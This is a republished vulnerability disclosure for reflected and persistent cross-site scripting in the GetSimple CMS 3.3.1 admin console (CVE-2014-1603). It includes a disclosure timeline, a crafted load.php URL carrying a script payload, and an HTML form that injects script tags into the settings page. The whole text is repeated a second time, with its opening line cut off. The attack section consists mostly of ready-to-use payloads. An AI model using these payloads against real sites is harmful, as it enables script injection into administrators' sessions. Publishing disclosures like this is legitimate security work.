Found some persistent and reflected cross site scripting in the Admin
console of GetSimple CMS 3.3.1 and below.
Waited 6 months for a fix but the developer stopped answering my
emails, so decided to release this anyway.
PoC for XSS bugs in the admin console of GetSimple CMS 3.3.1
CVE-2014-1603
by Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
Timeline:
04/11/2013 - Found bugs, produced proof of concept.
05/11/2013 - Communicated to the developer, which acknowledged receipt.
10/01/2014 - Politely asked the developer for progress, no response.
17/01/2014 - Received CVE number from MITRE.
20/01/2014 - Communicated CVE number to the developer, no response.
29/01/2014 - Politely asked the developer for progress, no response.
12/05/2014 - Public release.
==============================
Reflected XSS in plugin load page:
http://192.168.56.101/getsimple/admin/load.php?id=anonymous_data¶m="><script>alert(1)</script>
Persistent XSS in settings page:
<form name="input" action="http://192.168.56.101/getsimple/admin/settings.php" method="post">
<input type="text" name="user" value=""><script>alert(1);</script>">
<input type="text" name="email" value=""><script>alert(2);</script>">
<input type="text" name="name" value=""><script>alert(3);</script>">
<input type="hidden" name="submitted" value="Save Settings">
<input type="submit" value="Submit">
</form>
source link: ttps://raw.githubusercontent.com/pedrib/PoC/master/getsimplecms-3.3.1.txt.
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
console of GetSimple CMS 3.3.1 and below.
Waited 6 months for a fix but the developer stopped answering my
emails, so decided to release this anyway.
PoC for XSS bugs in the admin console of GetSimple CMS 3.3.1
CVE-2014-1603
by Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
Timeline:
04/11/2013 - Found bugs, produced proof of concept.
05/11/2013 - Communicated to the developer, which acknowledged receipt.
10/01/2014 - Politely asked the developer for progress, no response.
17/01/2014 - Received CVE number from MITRE.
20/01/2014 - Communicated CVE number to the developer, no response.
29/01/2014 - Politely asked the developer for progress, no response.
12/05/2014 - Public release.
==============================
Reflected XSS in plugin load page:
http://192.168.56.101/getsimple/admin/load.php?id=anonymous_data¶m="><script>alert(1)</script>
Persistent XSS in settings page:
<form name="input" action="http://192.168.56.101/getsimple/admin/settings.php" method="post">
<input type="text" name="user" value=""><script>alert(1);</script>">
<input type="text" name="email" value=""><script>alert(2);</script>">
<input type="text" name="name" value=""><script>alert(3);</script>">
<input type="hidden" name="submitted" value="Save Settings">
<input type="submit" value="Submit">
</form>
source link: ttps://raw.githubusercontent.com/pedrib/PoC/master/getsimplecms-3.3.1.txt.
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information